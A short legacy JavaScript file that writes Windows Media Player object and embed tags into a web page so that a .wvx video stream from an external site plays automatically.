// movie.js
document.write('<object class="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6" id="player" codebase="http://www.microsoft.com/Windows/MediaPlayer/" width="320" height="300">');
document.write('<param name="url" value="http://speedmaster-st.com/cal321.wvx">');
document.write('<param name="autostart" value="true">');
document.write('<embed name="WMP" src="http://speedmaster-st.com/cal321.wvx" autostart="1" showcontrols="1" pluginspage="http://www.microsoft.com/Windows/MediaPlayer/" type="application/x-mplayer2" width="320" height="300"></embed>');
document.write('</object>');